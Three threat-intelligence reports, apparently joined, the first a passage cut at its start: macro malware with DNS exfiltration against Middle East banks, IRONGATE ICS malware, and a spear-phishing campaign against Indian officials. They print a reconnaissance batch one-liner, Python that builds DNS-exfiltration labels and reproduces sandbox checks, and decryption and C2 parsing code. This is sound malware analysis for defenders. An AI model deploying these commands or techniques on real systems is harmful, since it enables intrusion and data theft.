The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East. The themes of the messages are related to IT infrastructure, such as a Server Status Report log or a list of Cisco IronPort appliance details. In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks. This email was then forwarded to several people, with the malicious Excel file attached.

Macro Details

The macro first calls an Init() function (shown in Figure 1) that performs the following malicious activities:

  1. Extracts base64-encoded content from the cells of a worksheet titled "Incompatible".
  2. Checks for the presence of a file at the path %PUBLIC%\Libraries\update.vbs. If the file is not present, the macro creates three different directories under %PUBLIC%\Libraries, namely up, dn, and tp.
  3. The extracted content from step one is decoded using PowerShell and dropped into two different files: %PUBLIC%\Libraries\update.vbs and %PUBLIC%\Libraries\dns.ps1.
  4. The macro then creates a scheduled task named GoogleUpdateTaskMachineUI, which executes update.vbs every three minutes.

Note: Due to the use of a hardcoded environment variable %PUBLIC% in the macro code, the macro will only run successfully on Windows Vista and subsequent versions of the operating system.

Figure 1: Macro Init() subroutine

Run-time Unhiding of Content

One of the interesting techniques we observed in this attack was the display of additional content after the macro executed successfully. This was done for the purpose of social engineering – specifically, to convince the victim that enabling the macro did in fact result in the “unhiding” of additional spreadsheet data.

Office documents containing malicious macros are commonly used in crimeware campaigns. Because default Office settings typically require user action in order for macros to run, attackers may convince victims to enable risky macro code by telling them that the macro is required to view “protected content.”

In crimeware campaigns, we usually observe that no additional content is displayed after enabling the macros. However, in this case, attackers took the extra step to actually hide and unhide worksheets when the macro is enabled to allay any suspicion. A screenshot of the worksheet before and after running the macro is shown in Figure 2 and Figure 3, respectively.

Figure 2: Before unhiding of content

Figure 3: After unhiding of content

In the following code section, we can see that the subroutine ShowHideSheets() is called after the Init() subroutine executes completely:

Private Sub Workbook_Open()
    Call Init
    Call ShowHideSheets
End Sub

The code of subroutine ShowHideSheets(), which unhides the content after completion of malicious activities, is shown in Figure 4.

Figure 4: Macro used to unhide content at runtime

First Stage Download

After the macro successfully creates the scheduled task, the dropped VBScript, update.vbs (Figure 5), will be launched every three minutes. This VBScript performs the following operations:

  1. Leverages PowerShell to download content from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  2. Uses PowerShell to download a BAT file from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  3. Executes the BAT file and stores the results in a file in the path %PUBLIC%\Libraries\up.
  4. Uploads this file to the server by sending an HTTP POST request to the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u.
  5. Finally, it executes the PowerShell script dns.ps1, which is used for the purpose of data exfiltration using DNS.

Figure 5: Content of update.vbs

During our analysis, the VBScript downloaded a customized version of Mimikatz in the previously mentioned step one. The customized version uses its own default prompt string as well as its own console title, as shown in Figure 6.

Figure 6: Custom version of Mimikatz used to extract user password hashes

Similarly, the contents of the BAT file downloaded in step two are shown in Figure 7:

whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

Figure 7: Content of downloaded BAT script

This BAT file is used to collect important information from the system, including the currently logged on user, the hostname, network configuration data, user and group accounts, local and domain administrator accounts, running processes, and other data.

Data Exfiltration over DNS

Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel. This was likely done because DNS is required for normal network operations. The DNS protocol is unlikely to be blocked (allowing free communications out of the network) and its use is unlikely to raise suspicion among network defenders.

The script dns.ps1, dropped by the macro, is used for this purpose. In the following section, we describe its functionality in detail.

  1. The script requests an ID (through the DNS protocol) from go0gIe[.]com. This ID will then be saved into the PowerShell script.
  2. Next, the script queries the C2 server for additional instructions. If no further actions are requested, the script exits and will be activated again the next time update.vbs is called.
  3. If an action is required, the DNS server replies with an IP with the pattern 33.33.xx.yy. The script then proceeds to create a file at %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. The script then proceeds to make DNS requests to fetch more data. Each DNS request results in the C2 server returning an IP address. Each octet of the IP address is interpreted as the decimal representation of an ASCII character; for example, the decimal number 99 is equivalent to the ASCII character ‘c’. The characters represented by the octets of the IP address are appended to the batch file to construct a script. The C2 server signals the end of the data stream by replying to a DNS query with the IP address 35.35.35.35.
  4. Once the file has been successfully transferred, the BAT file will be run and its output saved as %PUBLIC%\Libraries\tp\chr(xx)chr(yy).txt.
  5. The text file containing the results of the BAT script will then be uploaded to the DNS server by embedding file data into part of the subdomain. The format of the DNS query used is shown in Table 1.
  6. The BAT file and the text file will then be deleted. The script then quits, to be invoked again upon running the next scheduled task.
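The decoding side of step three can be sketched in Python. The replies below are hypothetical, but the octet-to-ASCII scheme and the 35.35.35.35 terminator are as described above:

```python
def rebuild_script(ip_replies):
    """Reassemble a script from successive DNS answers: each octet of a
    returned IP is the decimal code of one ASCII character, and the
    sentinel 35.35.35.35 ends the stream."""
    data = bytearray()
    for ip in ip_replies:
        if ip == "35.35.35.35":
            break
        data.extend(int(octet) for octet in ip.split("."))
    return data.decode("ascii")

# Hypothetical replies spelling out the start of a recon command
replies = ["119.104.111.97", "109.105.32.38", "35.35.35.35"]
print(rebuild_script(replies))  # whoami &
```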

The DNS communication portion of the script is shown in Figure 8, along with a table showing the various subdomain formats being generated by the script.

Figure 8: Code Snippet of dns.ps1

Format of subdomains used in the DNS C2 protocol:

  • Request for the BotID (used in step 2 above): [00][botid]00000[base36 random number]30

  • File transfer (used in step 3 above): [00][botid]00000[base36 random number]232A[hex_filename][i-counter]

  • File upload (used in step 5 above): [00][botid][cmdid][partid][base36 random number][48-hex-char-of-file-content]

Table 1: C2 Protocol Format
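As a rough model of the upload format, the following Python sketch splits a file into 24-byte pieces, hex-encodes each into the 48-character field, and assembles subdomain labels. The exact widths of the botid, cmdid and partid fields are not documented, so treat those as assumptions:

```python
import secrets

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"

def base36(n):
    """Encode a non-negative integer in base 36."""
    s = ""
    while True:
        n, r = divmod(n, 36)
        s = ALPHABET[r] + s
        if n == 0:
            return s

def upload_labels(botid, cmdid, payload: bytes):
    """Yield subdomain labels shaped like
    [00][botid][cmdid][partid][base36 random][48 hex chars of content],
    carrying 24 bytes of file content per DNS query."""
    for partid, off in enumerate(range(0, len(payload), 24)):
        rand = base36(secrets.randbelow(36 ** 4))
        yield "00%s%s%d%s%s" % (botid, cmdid, partid, rand,
                                payload[off:off + 24].hex())
```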

Conclusion

Although this attack did not leverage any zero-days or other advanced techniques, it was interesting to see how attackers used different components to perform reconnaissance activities on a specific target.

This attack also demonstrates that macro malware is effective even today. Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

IRONGATE ICS Malware: Nothing to See Here…Masking Malicious Activity on SCADA Systems


In the latter half of 2015, the FireEye Labs Advanced Reverse Engineering (FLARE) team identified several versions of an ICS-focused malware crafted to manipulate a specific industrial process running within a simulated Siemens control system environment. We named this family of malware IRONGATE.

FLARE found the samples on VirusTotal while researching droppers compiled with PyInstaller — an approach used by numerous malicious actors. The IRONGATE samples stood out based on their references to SCADA and associated functionality. Two samples of the malware payload were uploaded by different sources in 2014, but none of the antivirus vendors featured on VirusTotal flagged them as malicious.

Siemens Product Computer Emergency Readiness Team (ProductCERT) confirmed that IRONGATE is not viable against operational Siemens control systems and determined that IRONGATE does not exploit any vulnerabilities in Siemens products. We are unable to associate IRONGATE with any campaigns or threat actors. We acknowledge that IRONGATE could be a test case, proof of concept, or research activity for ICS attack techniques.

Our analysis finds that IRONGATE invokes ICS attack concepts first seen in Stuxnet, but in a simulation environment. Because the body of industrial control systems (ICS) and supervisory control and data acquisition (SCADA) malware is limited, we are sharing details with the broader community.

Malicious Concepts

Deceptive Man-in-the-Middle

IRONGATE's key feature is a man-in-the-middle (MitM) attack against process input-output (IO) and process operator software within industrial process simulation. The malware replaces a Dynamic Link Library (DLL) with a malicious DLL, which then acts as a broker between a PLC and the legitimate monitoring software. This malicious DLL records five seconds of 'normal' traffic from a PLC to the user interface and replays it, while sending different data back to the PLC. This could allow an attacker to alter a controlled process unbeknownst to process operators.

Sandbox Evasion

IRONGATE's second notable feature is sandbox evasion. Some droppers for the IRONGATE malware would not run if VMware or Cuckoo Sandbox environments were present. The effort put into these anti-sandbox techniques indicates that the author wanted the code to avoid detection and resist casual analysis. It also implies that IRONGATE’s purpose was malicious, as opposed to a tool written for other legitimate purposes.

Dropper Observables

We first identified IRONGATE when investigating droppers compiled with PyInstaller — an approach used by numerous malicious actors. In addition, strings found in the dropper include the word “payload”, which is commonly associated with malware.

Unique Features for ICS Malware

While IRONGATE malware does not compare to Stuxnet in terms of complexity, ability to propagate, or geopolitical implications, IRONGATE leverages some of the same features and techniques Stuxnet used to attack centrifuge rotor speeds at the Natanz uranium enrichment facility; it also demonstrates new features for ICS malware.

  • Both pieces of malware look for a single, highly specific process.
  • Both replace DLLs to achieve process manipulation.
  • IRONGATE detects malware detonation/observation environments, whereas Stuxnet looked for the presence of antivirus software.
  • IRONGATE actively records and plays back process data to hide manipulations, whereas Stuxnet did not attempt to hide its process manipulation, but suspended normal operation of the S7-315 so even if rotor speed had been displayed on the HMI, the data would have been static.

A Proof of Concept

IRONGATE’s characteristics lead us to conclude that it is a test, proof of concept, or research activity.

  • The code is specifically crafted to look for a user-created DLL communicating with the Siemens PLCSIM environment. PLCSIM is used to test PLC program functionality prior to in-field deployment. The DLLs that IRONGATE seeks and replaces are not part of the Siemens standard product set, but communicate with the S7ProSim COM object. This suggests the malware author tested concepts using commercial simulation software.
  • Code in the malicious software closely matched usage on a control engineering blog dealing with PLCSIM (https://alexsentcha.wordpress.com/using-s7-prosim-with-siemens-s7-plcsim/ and https://pcplcdemos.googlecode.com/hg/S7PROSIM/BioGas/S7%20v5.5/).
  • While we have identified and analyzed several droppers for the IRONGATE malware, we have yet to identify the code’s infection vector.
  • In addition, our analysis did not identify what triggers the MitM payload to install; the scada.exe binary that deploys the IRONGATE DLL payload appears to require manual execution.
  • We have not identified any other instances of the ICS-specific IRONGATE components (scada.exe and Step7ProSim.dll), despite their having been compiled in September of 2014.
  • Siemens ProductCERT has confirmed that the code would not work against a standard Siemens control system environment.

Implications for ICS Asset Owners

Even though process operators face no increased risk from the currently identified members of the IRONGATE malware family, IRONGATE provides valuable insight into adversary mindset.

Network security monitoring, indicator of compromise (IoC) matching, and good practice guidance from vendors and other stakeholders represent important defensive techniques for ICS networks.

To specifically counter IRONGATE’s process attack techniques, ICS asset owners may, over the longer term, implement solutions that:

  • Require integrity checks and code signing for vendor and user generated code. Lacking cryptographic verification facilitates file replacement and MitM attacks against controlled industrial processes.
  • Develop mechanisms for sanity checking IO data, such as independent sensing and backhaul, and comparison with expected process state information. Ignorance of expected process state facilitates an attacker’s ability to achieve physical consequence without alarming operators.

Technical Malware Analysis

IRONGATE Dropper Family

FireEye has identified six IRONGATE droppers: bla.exe, update.exe1, update.exe2, update_no_pipe.exe1, update_no_pipe.exe2, and update.exe3. All but one of these Python-based droppers first check for execution in a VMware or Cuckoo Sandbox environment. If either is found, the malware exits.

If not found, the IRONGATE dropper extracts a UPX-packed, publicly available utility (NirSoft NetResView version 1.27) to audiodg.exe in the same directory as the dropper. The dropper then executes the utility using the command audiodg.exe /scomma scxrt2.ini. This command populates the file scxrt2.ini with a comma-separated list of network resources identified by the host system.

The dropper iterates through each entry in scxrt2.ini, looking for paths named move-to-operational or move-to-operational.lnk. If a path is found, the dropper first extracts the Base64-encoded .NET executable scada.exe to the current directory and then moves the file to the path containing move-to-operational or move-to-operational.lnk. The path move-to-operational is interesting as well, perhaps implying that IRONGATE was not seeking the actual running process, but rather a staging area for code promotion. The dropper does not execute the scada.exe payload after moving it.
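The dropper’s search logic amounts to scanning NetResView’s CSV output for the marker path. A Python approximation might look like the following; the exact column layout of scxrt2.ini is an assumption here, so we match the marker anywhere in a row:

```python
import csv

MARKERS = ("move-to-operational", "move-to-operational.lnk")

def find_staging_paths(scxrt2_ini):
    """Scan the /scomma CSV output for network resource paths ending in the
    dropper's marker names."""
    hits = []
    with open(scxrt2_ini, newline="", encoding="utf-8", errors="replace") as f:
        for row in csv.reader(f):
            for field in row:
                if field.strip().lower().endswith(MARKERS):
                    hits.append(field.strip())
    return hits
```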

Anti-Analysis Techniques

Each IRONGATE dropper currently identified deploys the same .NET payload, scada.exe. All but one of the droppers incorporated anti-detection/analysis techniques to identify execution in VMware or the Cuckoo Sandbox. If such environments are detected, the dropper will not deploy the .NET executable (scada.exe) to the host.

Four of the droppers (update.exe1, update_no_pipe.exe1, update_no_pipe.exe2, and update.exe3) detect Cuckoo environments by scanning subdirectories of %SystemDrive%. Directories with names longer than five but shorter than ten characters are inspected for the subdirectories drop, files, logs, memory, and shots. If a matching directory is found, the dropper does not attempt to deploy the scada.exe payload.
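This heuristic is easy to reproduce. The following Python sketch mirrors the described check; exact name matching and case handling are assumptions on our part:

```python
import os

CUCKOO_SUBDIRS = {"drop", "files", "logs", "memory", "shots"}

def looks_like_cuckoo(system_drive):
    """Mirror the droppers' check: any subdirectory of the system drive with
    a 6-9 character name containing Cuckoo's analysis folders is treated as
    a sandbox."""
    for name in os.listdir(system_drive):
        path = os.path.join(system_drive, name)
        if os.path.isdir(path) and 5 < len(name) < 10:
            try:
                children = set(os.listdir(path))
            except OSError:
                continue  # unreadable directory, skip it
            if CUCKOO_SUBDIRS.issubset(children):
                return True
    return False
```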

The update.exe1 and update.exe3 droppers contain code for an additional Cuckoo check using the SysInternals pipelist program, install.exe, but the code is disabled in each.

The update.exe2 dropper includes a check for VMware instead of Cuckoo. The VMware check looks for the registry key HKLM\SOFTWARE\VMware, Inc.\VMware Tools and the files %WINDIR%\system32\drivers\vmmouse.sys and %WINDIR%\system32\drivers\vmhgfs.sys. If any of these are found, the dropper does not attempt to deploy the scada.exe payload.

The dropper bla.exe does not include an environment check for either Cuckoo or VMware.

scada.exe Payload

We surmise that scada.exe is a user-created payload used for testing the malware. First, our analysis did not indicate what triggers scada.exe to run. Second, Siemens ProductCERT informed us that scada.exe is not a default file name associated with Siemens industrial control software.

When scada.exe executes, it scans drives attached to the system for filenames ending in Step7ProSim.dll. According to the Siemens ProductCERT, Step7ProSim.dll is not part of the Siemens PLCSIM software. We were unable to determine whether this DLL was created specifically by the malware author, or if it was from another source, such as example code or a particular custom ICS implementation. We surmise this DLL simulates generation of IO values, which would normally be provided by an S7-based controller, since the functions it includes appear derived from the Siemens PLCSIM environment.

If scada.exe finds a matching DLL file name, it kills all running processes with the name biogas.exe. The malware then moves Step7ProSim.dll to Step7ConMgr.dll and drops a malicious Step7ProSim.dll – the IRONGATE payload – to the same directory.

The malicious Step7ProSim.dll acts as an API proxy between the original user-created Step7ProSim.dll (now named Step7ConMgr.dll) and the application biogas.exe that loads it. Five seconds after loading, the malicious Step7ProSim.dll records five seconds of calls to ReadDataBlockValue. All future calls to ReadDataBlockValue return the recorded data.

Simultaneously, the malicious DLL discards all calls to WriteDataBlockValue and instead calls WriteInputPoint(0x110, 0, 0x7763) and WriteInputPoint(0x114, 0, 0x7763) every millisecond. All of these functions are named similarly to those of the Siemens S7ProSim v5.4 COM interface. Other API calls appear to be passed through the malicious DLL to the legitimate DLL without modification.
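Conceptually, the malicious DLL behaves like a record-and-replay proxy. The Python model below illustrates the idea; the backend interface names are hypothetical stand-ins for the S7ProSim-style calls:

```python
import time

class RecordReplayProxy:
    """Toy model of the malicious Step7ProSim.dll: forward reads to the real
    backend for the first five seconds while recording them, then replay the
    recording forever, and silently drop operator writes."""

    def __init__(self, backend, record_seconds=5.0):
        self.backend = backend
        self.deadline = time.monotonic() + record_seconds
        self.tape = []   # recorded 'normal' values
        self.pos = 0

    def read_data_block_value(self, *args):
        if time.monotonic() < self.deadline:
            value = self.backend.read_data_block_value(*args)
            self.tape.append(value)               # record normal traffic
            return value
        value = self.tape[self.pos % len(self.tape)]  # replay in a loop
        self.pos += 1
        return value

    def write_data_block_value(self, *args):
        # operator writes are discarded; the proxy writes its own
        # hardcoded values to the PLC instead
        self.backend.write_input_point(0x110, 0, 0x7763)
        self.backend.write_input_point(0x114, 0, 0x7763)
```

The operator’s display keeps showing the recorded values while the PLC receives only the attacker’s writes, which is exactly the deceptive effect described above.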

Biogas.exe

As mentioned previously, IRONGATE seeks to manipulate code similar to that found on a blog dealing with simulating PLC communications using PLCSIM, including the use of an executable named biogas.exe.

Examination of the executable from that blog’s demo code shows that the WriteInputPoint function calls with byte indices 0x110 and 0x114 set pressure and temperature values, respectively:

IRONGATE:

    WriteInputPoint(0x110, 0, 0x7763)
    WriteInputPoint(0x114, 0, 0x7763)

Equivalent pseudocode from biogas.exe:

    S7ProSim.WriteInputPoint(0x110, 0, (short)this.Pressure.Value)
    S7ProSim.WriteInputPoint(0x114, 0, (short)this.Temperature.Value)

We have been unable to determine the significance of the hardcoded value 0x7763, which is passed in both instances of the write function.

Because of the noted indications that IRONGATE is a proof of concept, we cannot conclude that IRONGATE’s author intends to manipulate the specific temperature or pressure values associated with the biogas.exe process, but we find the similarities to this example code striking.

Artifacts and Indicators

PyInstaller Artifacts

The IRONGATE droppers are Python scripts converted to executables using PyInstaller. The compiled droppers contain PyInstaller artifacts from the system on which the executables were created. These artifacts may link other samples compiled on the same system. Five of the six droppers (bla.exe, update.exe1, update_no_pipe.exe1, update_no_pipe.exe2 and update.exe3) share the same PyInstaller artifacts, listed in Table 1.

Table 1: PyInstaller Artifacts

The remaining dropper, update.exe2, contains the artifacts listed in Table 2.

Table 2: PyInstaller Artifacts for update.exe2

Unique Strings

Figures 1 and 2 list the unique strings discovered in the scada.exe and Step7ProSim.dll binaries.

Figure 1: Scada.exe Unique Strings

Figure 2: Step7ProSim.dll Unique Strings

File Hashes

Table 3 contains the MD5 hashes, file and architecture type, and compile times for the malware analyzed in this report.

Table 3: File MD5 Hashes and Compile Times

FireEye detects IRONGATE. A list of indicators can be found here.

Special thanks to the Siemens ProductCERT for providing support and context to this investigation.

APT Group Sends Spear Phishing Emails to Indian Government Officials


Introduction
On May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years, conducting suspected intelligence collection operations against South Asian political and military targets.

This group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call Transparent Tribe, in a March blog post.

In this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government’s 7th Central Pay Commission (CPC). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.

Malware Delivery Method
In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload.

In previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.

The email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests that the recipient open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other, non-public addresses through other means.


Figure 1: Contents of the Email

A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.

Exploit Analysis
Despite being an older vulnerability, many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.


Figure 2: Exploit Shellcode used to Locate and Decode Payload

The shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:
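The marker-based carving the shellcode performs can be sketched as follows. This is a minimal illustration of the extraction step only; the decoding routine applied to the carved bytes is not specified here, so the sketch returns the still-encoded payload:

```python
# Sketch: carve the embedded payload from the exploit document the way
# the shellcode does, by locating the 0xBABABABA start marker and the
# 0xBBBBBBBB end marker (written here as little-endian byte sequences).
START_MARKER = b"\xba\xba\xba\xba"  # 0xBABABABA
END_MARKER = b"\xbb\xbb\xbb\xbb"    # 0xBBBBBBBB

def carve_payload(doc: bytes) -> bytes:
    """Return the bytes between the start and end markers, or b'' if absent."""
    start = doc.find(START_MARKER)
    if start == -1:
        return b""
    start += len(START_MARKER)
    end = doc.find(END_MARKER, start)
    if end == -1:
        return b""
    return doc[start:end]
```

A static carver like this is useful for pulling the embedded executable out of the Word document without detonating the exploit.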

Lastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces’ pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.


Figure 3: Decoy Document related to 7th Pay Commission

 

The decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user “Bhopal”.


Figure 4: Metadata of the Document

The payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.

The following is a brief summary of the activities performed by the dropped payload:

1. Decrypts resource 1337 using a hard-coded 14-byte key "MjEh92jHaZZOl3". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:


Figure 5: Encryption/ Decryption Function

  • Generates an array of integers from 0x00 to 0xff
  • Scrambles the state of the table using the given key
  • Encrypts or decrypts a string using the scrambled table from the previous step
  • A Python script that can be used to decrypt this resource is provided in the appendix below.

2. The decrypted resource contains the C2 server’s IP address as well as the mutex name.

3. If the mutex does not exist and a Windows Startup Registry key with name “System Update” does not exist, the malware performs its initialization routine by:

  • Copying itself to the path %PROGRAMDATA%\svchost.exe
  • Setting the Windows Startup Registry key with the name “System Update” to point to the above dropped payload.

4. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals over TCP port 10500. Once a connection is established, the malware tries to fetch a response from the server through its custom protocol.

5. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.

6. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key “AjN28AcMaNX”.

7. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:
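The table scramble described in step 1 matches the shape of RC4, and steps 5 and 6 describe a simple length-prefixed framing. The sketch below illustrates both under those assumptions; the standard RC4 cipher and the little-endian byte order of the size DWORD (typical on Windows) are assumptions, not details confirmed from the sample:

```python
import struct

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4-style routine matching the description: build a 0x00-0xff
    table, scramble it with the key, then encrypt/decrypt symmetrically."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling (scramble)
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

START_BYTE = b"\x99"

def extract_command(response: bytes, key: bytes = b"AjN28AcMaNX") -> bytes:
    """Skip to the 0x99 start byte, read the size DWORD (assumed
    little-endian), and decrypt the data string that follows."""
    idx = response.find(START_BYTE)
    if idx == -1 or len(response) < idx + 5:
        return b""
    (size,) = struct.unpack_from("<I", response, idx + 1)
    return rc4(key, response[idx + 5 : idx + 5 + size])
```

Since step 7 notes that commands and their arguments are in Unicode, the decrypted bytes would then be decoded (for example as UTF-16-LE, the usual Windows convention) before dispatch.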

Conclusion
As with previous spear phishing attacks conducted by this group, topics related to Indian government and military affairs are still being used as lure themes, and we observed that the group is actively expanding its toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.

Appendix

Encryption / Decryption algorithm translated into Python
